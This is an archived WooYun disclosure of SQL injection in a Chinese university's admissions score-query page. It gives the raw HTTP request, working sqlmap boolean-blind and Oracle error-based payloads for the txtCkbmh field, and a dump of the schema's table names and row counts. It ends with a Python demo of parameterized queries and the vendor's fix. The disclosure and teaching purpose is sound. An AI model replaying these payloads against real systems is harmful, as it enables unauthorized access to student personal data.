WooYun (WooYun.org) historical vulnerability archive --- http://wy.zone.ci/
WooYun Drops articles online --------http://drop.zone.ci/
2015-12-10: Details reported to the vendor, awaiting vendor handling
2015-12-14: Vendor confirmed; details disclosed to the vendor only
2015-12-24: Details disclosed to core white hats and relevant domain experts
2016-01-03: Details disclosed to regular white hats
2016-01-13: Details disclosed to intern white hats
2016-01-25: Details disclosed to the public
As titled.
http://ygzs.shutcm.edu.cn/ Shanghai University of Traditional Chinese Medicine "Sunshine Admissions" information platform
POST /Pages/EnrolRegistUpGradeScore.aspx HTTP/1.1
Content-Length: 429
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://ygzs.shutcm.edu.cn
Cookie: ASP.NET_SessionId=dzywts5rl2aqqidbfpvwlz5m; CNZZDATA1254023599=1912620956-1449309629-http%253A%252F%252Fwww.acunetix-referrer.com%252F%7C1449309629; bdshare_firstime=1449310636107
Host: ygzs.shutcm.edu.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

btnSearch=%e6%9f%a5%e8%af%a2&ddlYear=2015&txtCkbmh=-1&txtIdenty=1&__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=/wEWBgKYoPnfBgK71qnUAwL4wa6BDQKFpYVEApbO0uUEAqWf8%2b4K2aAdHUn7sWQjApfH5/KQWD2geJ03DnGCoV5QDGbcFb0%3d&__VIEWSTATE=/wEPDwUKLTI0MjMxNTMyMA9kFgICAw9kFgICAw9kFgJmD2QWAgIBDxBkEBUCBuWFqOmDqAQyMDE1FQIABDIwMTUUKwMCZ2dkZGRAMQgveRc08S8Pa8khCOyeKCo839CL2vVMzZPZNr%2bDIQ%3d%3d
The txtCkbmh parameter (spring-enrolment registration number) is injectable. Both sqlmap payloads below open with a single quote and close with AND 'xxxx'='xxxx, so the value is being concatenated into a quoted string literal of an Oracle query rather than bound as a parameter.
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: txtCkbmh (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: btnSearch=%e6%9f%a5%e8%af%a2&ddlYear=2015&txtCkbmh=-2022' OR 5183=5183 AND 'HZWU'='HZWU&txtIdenty=1&__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=/wEWBgKb0Zi6DwK71qnUAwL4wa6BDQKFpYVEApbO0uUEAqWf8+4Kkq1XaPXXQAhUQCaF0deJ50Ypwf2Bhx0+Jl/oDsZGFEM=&__VIEWSTATE=/wEPDwUKLTI0MjMxNTMyMA9kFgICAw9kFgICAw9kFgJmD2QWBgIBDxBkEBUCBuWFqOmDqAQyMDE1FQIABDIwMTUUKwMCZ2dkZAIJDw8WBh4EVGV4dAU65rKh5pyJ5om+5Yiw5Lu75L2V5L+h5oGvIO+8jOivt+ajgOafpei+k+WFpeaYr+WQpuacieivr++8gR4JRm9yZUNvbG9yCo0BHgRfIVNCAgRkZAILDxYCHglpbm5lcmh0bWxlZGQAqWXWR+u78GVYRmFz/ymcaJDlj16CEj9bWaAh+75jNg==

    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)
    Payload: btnSearch=%e6%9f%a5%e8%af%a2&ddlYear=2015&txtCkbmh=-1' AND 7827=CTXSYS.DRITHSX.SN(7827,(CHR(113)||CHR(113)||CHR(118)||CHR(98)||CHR(113)||(SELECT (CASE WHEN (7827=7827) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(118)||CHR(118)||CHR(118)||CHR(113))) AND 'epVS'='epVS&txtIdenty=1&__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=/wEWBgKb0Zi6DwK71qnUAwL4wa6BDQKFpYVEApbO0uUEAqWf8+4Kkq1XaPXXQAhUQCaF0deJ50Ypwf2Bhx0+Jl/oDsZGFEM=&__VIEWSTATE=/wEPDwUKLTI0MjMxNTMyMA9kFgICAw9kFgICAw9kFgJmD2QWBgIBDxBkEBUCBuWFqOmDqAQyMDE1FQIABDIwMTUUKwMCZ2dkZAIJDw8WBh4EVGV4dAU65rKh5pyJ5om+5Yiw5Lu75L2V5L+h5oGvIO+8jOivt+ajgOafpei+k+WFpeaYr+WQpuacieivr++8gR4JRm9yZUNvbG9yCo0BHgRfIVNCAgRkZAILDxYCHglpbm5lcmh0bWxlZGQAqWXWR+u78GVYRmFz/ymcaJDlj16CEj9bWaAh+75jNg==
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 4.0.30128
back-end DBMS: Oracle
current user: 'XUEGONG'
current schema (equivalent to database on Oracle): 'XUEGONG'
current user is DBA: False
available databases [7]:
[*] CTXSYS
[*] EXFSYS
[*] OLAPSYS
[*] SYS
[*] SYSTEM
[*] XDB
[*] XUEGONG
Database: XUEGONG
+--------------------------------+---------+
| Table                          | Entries |
+--------------------------------+---------+
| LEAVESCHOOL_IMPORTDATA         | 66726   |
| XSPY_STUDENTAPPRISE_DETAIL     | 61996   |
| PROJECTQUALIFICATIONS          | 30016   |
| TBMESSAGE                      | 29935   |
| STUDENTUSER                    | 12453   |
| STUBASIC                       | 12450   |
| ENROLREGISTERDATA              | 12262   |
| STUFAMILY                      | 10962   |
| STUBASIC_SYNC                  | 10574   |
| STUBASICTEMP                   | 10019   |
| XSPY_STUDENTAPPRISE            | 8853    |
| STUFAMILYTEMP                  | 8395    |
| TIMETABLE                      | 6816    |
| TBLDORMSTU                     | 6324    |
| TBLDORMAPP                     | 5777    |
| PROJECTAPPLICATION             | 5533    |
| AWARDS                         | 3842    |
| STUXJYD                        | 3806    |
| TBPROVINCE                     | 3590    |
| STULEARNING                    | 3534    |
| STUFAMILYECOMSITUATION         | 2984    |
| TBLDORMROOM                    | 2396    |
| STUFAMILYECOMSITUATIONTEMP     | 2247    |
| NEWARRIVALBASIC                | 1849    |
| RECIPIENTS                     | 1626    |
| POSTGRADUATE_STUBASIC          | 1553    |
| LEAVESCHOOL_SUMMARY            | 1355    |
| TBLHYGIENE                     | 1324    |
| TBKNSAPP                       | 1083    |
| TBNEWKNSAPP                    | 982     |
| INFORMATION                    | 840     |
| NEWARRIVALDORMARR              | 800     |
| ENROLREGISTTAKINGCASESUMMER    | 729     |
| TBROLE_ROLEMENU                | 699     |
| TBKNSAPPHISTORY                | 658     |
| ENROLSCORE                     | 632     |
| TBATTENCECERT                  | 606     |
| STUSTAYEDREG                   | 495     |
| ENROLUSER                      | 429     |
| TBCLASSHISTORY                 | 414     |
| TBBBXSZSQ                      | 255     |
| TBROLE_ROLEUSER                | 241     |
| LEAVESCHOOL_BYHKQRREGIST       | 237     |
| TBTEACHERS                     | 224     |
| XSPY_APPRISE_ITEM              | 220     |
| TOURVISITED                    | 219     |
| TBCLASS                        | 154     |
| NEWARRIVALMASTER               | 149     |
| TUANWEI_GROUPRELATIONSHIP      | 144     |
| TBROLE_MENU                    | 140     |
| TBMAJORHISTORY                 | 137     |
| ENROLREGISTTAKINGCASE          | 136     |
| TUANWEI_ZB                     | 135     |
| ENROLUPGRADEDSCORE             | 134     |
| STUDENTMENUPERMISSION          | 133     |
| TBTRAINTICKETSAPP              | 133     |
| PROJECTCHARITYACTIVITIES       | 131     |
| STUDENTNAVPERMISSION           | 128     |
| STUBASIC_IMPORT                | 123     |
| TBLDORMFLOOR                   | 118     |
| TBLACTROOMAPP                  | 115     |
| TBLACTROOMPLAN                 | 109     |
| ENROLDETAIL                    | 98      |
| LEAVESCHOOL_BDZIMPORT          | 96      |
| PROJECTLEVEL                   | 90      |
| WORKFLOW_FLOW                  | 81      |
| STUDENTNAVMANAGE               | 78      |
| TBADMISSIONMAJOR               | 75      |
| ASKFORLEAVEAPP                 | 72      |
| TBDEPARTMENTHISTORY            | 69      |
| LEAVESCHOOL_STUDENT_SFZMATCH   | 62      |
| POSTGRADUATE_XY                | 61      |
| TBMZ                           | 58      |
| PROJECTTABLE                   | 55      |
| ENT                            | 53      |
| POSTGRADUATE_MAJOR             | 48      |
| JHSTUDENTLOAN                  | 41      |
| ENROLREGISTERFILE              | 39      |
| TBMAJOR                        | 39      |
| ENROLMENU                      | 36      |
| ACTIVITY                       | 32      |
| FDY_RECORDFORCONTACTSTUDENT    | 29      |
| TBATTENCECERTTEMP              | 27      |
| TBROLE_ROLEGROUP               | 26      |
| ENGLISHMAJOR                   | 24      |
| XUEKEANDZHUANYE                | 24      |
| WORKFLOW_FORM                  | 21      |
| TBLDORM                        | 17      |
| TBXHCONFIG                     | 17      |
| MATCHXH                        | 15      |
| TBDEPARTMENT                   | 15      |
| FDY_TRAINNINGRECORD            | 13      |
| TBTEACHERRYFL                  | 13      |
| TBZZMM                         | 13      |
| FDY_RECORDFORCONTACTFAMILY     | 11      |
| TBLACTROOM                     | 11      |
| APPLICATIONHISTORY             | 10      |
| FDY_BASICINFO                  | 10      |
| FDY_RECORDFORCONTACTTEACHER    | 10      |
| POSTGRADUATE_XL                | 10      |
| XSPY_ITEMS                     | 10      |
| ASKFORLEAVEAPPTEMP             | 9       |
| FDY_RECORDFORCLASSMEET         | 9       |
| LEAVESCHOOL_ITEM               | 9       |
| LEAVESCHOOL_PARAMETERS         | 9       |
| TBLREPAIRAPP                   | 9       |
| ENROLCONFIG                    | 8       |
| FDY_PUBLISHARTICLE             | 8       |
| POSTGRADUATE_TRAIN             | 8       |
| WORKFLOW_SETTINGS              | 8       |
| ENROLTHREESCHOOLSCORE          | 7       |
| FAMILYTYPE                     | 7       |
| FAMILYTYPETEMP                 | 7       |
| FDY_FDYAWARDS                  | 7       |
| FDY_RECORDFORVISITCLASSROOM    | 7       |
| POSTION                        | 7       |
| TBKNBZ                         | 7       |
| ENROLREGISTERTABLE             | 6       |
| ENROLTIMEPERIOD                | 6       |
| FDY_RECORDFOREXAMSUPERVISOR    | 6       |
| REGISTERPERIOD                 | 6       |
| ENROLBANNER                    | 5       |
| FDY_CLASSAWARDS                | 5       |
| TBPYFS                         | 5       |
| TBXL                           | 5       |
| TUANWEI_ZW                     | 5       |
| ENROLBBTYZ                     | 4       |
| FDY_APPLYFORCOURSE             | 4       |
| FDY_RECORDFOREDUCATIONACTIVITY | 3       |
| FDY_STUDENTAWARDS              | 3       |
| POSTGRADUATE_XSZ               | 3       |
| STUDENTFROMTYPEMANAGE          | 3       |
| TABLE_ZB                       | 3       |
| TBPARA                         | 3       |
| XSPY_APPRISE                   | 3       |
| FDY_RECORDFORVISITDORMATORY    | 2       |
| POSTIONHISTORY                 | 2       |
| TABLE_ZW                       | 2       |
| TBLOAN                         | 2       |
| CURRENTSEASON                  | 1       |
| FDY_RECORDFORSERIOUSEVENT      | 1       |
| FDY_TEACHSITUATION             | 1       |
| FDY_WORKIDEA                   | 1       |
| FDY_WORKSUMMARY                | 1       |
| NEWARRIVALMASTERCATEGORY       | 1       |
| TBQGPARA                       | 1       |
| TUANWEI_ROLE                   | 1       |
| WORKFLOW_TEMP                  | 1       |
| WORKLICENSE                    | 1       |
+--------------------------------+---------+
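The following Python is an added illustration, not code from the report or from the university's application. It models why the txtCkbmh value above is exploitable and what closes the hole: a string-concatenated WHERE clause beside a parameterized one, plus a whitelist check of the kind the vendor reply describes (numeric registration number, regex-checked ID card). An in-memory SQLite table stands in for the Oracle XUEGONG schema; the table name, column names, sample rows and validation patterns are all assumptions. Only the boolean-based payload is modelled, because the Oracle-specific error-based payload (CTXSYS.DRITHSX.SN) has no SQLite equivalent.

```python
import re
import sqlite3

# Constructed sample rows standing in for a score table in the XUEGONG schema.
# Table and column names are assumptions for this demo; the report only names
# the form fields (ddlYear, txtCkbmh, txtIdenty) and the back-end DBMS (Oracle).
SAMPLE_ROWS = [
    ("2015", "15001", "310101199001011234", "Zhang", 87),
    ("2015", "15002", "310101199002022345", "Li", 92),
    ("2014", "14003", "310101199003033456", "Wang", 78),
]

# Boolean-based blind payload exactly as sqlmap reported it for txtCkbmh.
SQLMAP_PAYLOAD = "-2022' OR 5183=5183 AND 'HZWU'='HZWU"

# Assumed whitelist rules in the spirit of the vendor's fix: the spring
# enrolment registration number is digits only, a PRC ID-card number is
# 17 digits plus a digit or X check character, the year is four digits.
YEAR_RE = re.compile(r"[0-9]{4}")
CKBMH_RE = re.compile(r"[0-9]{1,20}")
IDCARD_RE = re.compile(r"[0-9]{17}[0-9Xx]")


def make_db():
    """In-memory SQLite stand-in for the Oracle back end."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE enrol_upgraded_score "
        "(year TEXT, ckbmh TEXT, identy TEXT, name TEXT, score INTEGER)"
    )
    conn.executemany(
        "INSERT INTO enrol_upgraded_score VALUES (?, ?, ?, ?, ?)", SAMPLE_ROWS
    )
    return conn


def query_vulnerable(conn, year, ckbmh, identy):
    """String-built WHERE clause: the form value becomes part of the SQL text."""
    sql = (
        "SELECT name, score FROM enrol_upgraded_score "
        "WHERE year = '%s' AND identy = '%s' AND ckbmh = '%s'" % (year, identy, ckbmh)
    )
    return conn.execute(sql).fetchall()


def query_parameterized(conn, year, ckbmh, identy):
    """Bind variables: the payload is compared as a literal string and matches nothing."""
    sql = (
        "SELECT name, score FROM enrol_upgraded_score "
        "WHERE year = ? AND identy = ? AND ckbmh = ?"
    )
    return conn.execute(sql, (year, identy, ckbmh)).fetchall()


def validate_form(ddl_year, txt_ckbmh, txt_identy):
    """Server-side whitelist check on the three fields the score query takes."""
    return (
        YEAR_RE.fullmatch(ddl_year) is not None
        and CKBMH_RE.fullmatch(txt_ckbmh) is not None
        and IDCARD_RE.fullmatch(txt_identy) is not None
    )


def lookup(conn, ddl_year, txt_ckbmh, txt_identy):
    """Hardened handler: reject malformed input, then query with bind variables."""
    if not validate_form(ddl_year, txt_ckbmh, txt_identy):
        return None  # the page would show "invalid input"; no SQL is built
    return query_parameterized(conn, ddl_year, txt_ckbmh, txt_identy)


if __name__ == "__main__":
    db = make_db()
    # Legitimate lookup: one student's score.
    print(query_vulnerable(db, "2015", "15001", "310101199001011234"))
    # The sqlmap payload (with txtIdenty=1, as in the original request) turns
    # the WHERE clause into
    #   year='2015' AND identy='1' AND ckbmh='-2022' OR 5183=5183 AND 'HZWU'='HZWU'
    # AND binds tighter than OR, so the right-hand side is true for every row
    # and the vulnerable query returns the whole table.
    print(query_vulnerable(db, "2015", SQLMAP_PAYLOAD, "1"))
    # With bind variables the same payload is just an odd string: no rows.
    print(query_parameterized(db, "2015", SQLMAP_PAYLOAD, "1"))
    # Input validation stops the request before any SQL is built.
    print(lookup(db, "2015", SQLMAP_PAYLOAD, "1"))
    print(lookup(db, "2015", "15001", "310101199001011234"))
```

Run it with `python3 demo.py`. The point the two query functions make is that the regex and numeric checks the vendor added are a useful filter, but the bind variable is what actually removes the injection: with a parameterized query, the quote in the payload can never close the string literal, whether or not the field is validated first.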
Severity: Medium
Vulnerability Rank: 5
Confirmed: 2015-12-14 14:29
In the upgrade-to-bachelor score query, the ID-card text box has been given regular-expression validation, and the other text boxes, such as the spring enrolment registration number, have been given numeric validation.
None yet